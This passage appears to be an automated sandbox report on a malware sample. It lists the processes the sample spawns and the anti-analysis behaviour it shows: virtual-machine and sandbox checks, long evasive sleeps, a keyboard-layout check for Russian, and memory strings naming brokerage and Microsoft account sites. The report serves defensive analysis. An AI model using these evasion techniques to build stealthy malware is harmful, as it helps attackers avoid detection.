Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Check for Windows Defender sandbox
Source: C:\Users\user\AppData\Local\Temp\3530.exe File Queried: C:\INTERNAL\__empty Jump to behavior
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Query firmware table information (likely to detect VMs)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe System information queried: FirmwareTableInformation
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\file.exe API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\file.exe API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\sashibt API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\sashibt API/Special instruction interceptor: Address: 7FF8C88ED584
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: sashibt, 00000007.00000002.2706655309.0000000002657000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 21F85D80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 21F9F820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 21FA3150000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 2598CDA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 259A6780000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmnet.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmmouse.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxtray.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxhook.dll Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxservice.exe Jump to behavior
Contains functionality to detect virtual machines (SIDT)
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF849010E55 sidt fword ptr [ecx-08h] 11_2_00007FF849010E55
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 597937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 594906
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 478 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1265 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 704 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1858 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 887 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 864 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Window / User API: threadDelayed 1044 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9561
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 367
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3288 Thread sleep time: -126500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6568 Thread sleep time: -70400s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3288 Thread sleep time: -185800s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 3560 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 3560 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 5804 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2952 Thread sleep time: -210000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536 Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536 Thread sleep time: -597937s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536 Thread sleep time: -594906s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A7000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF7A09A71AFh 8_2_00007FF7A09A7000
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 597937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 594906
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3002238333.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 7C81.exe.2.dr Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 7C81.exe, 0000000A.00000002.2957905311.0000022ADE938000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
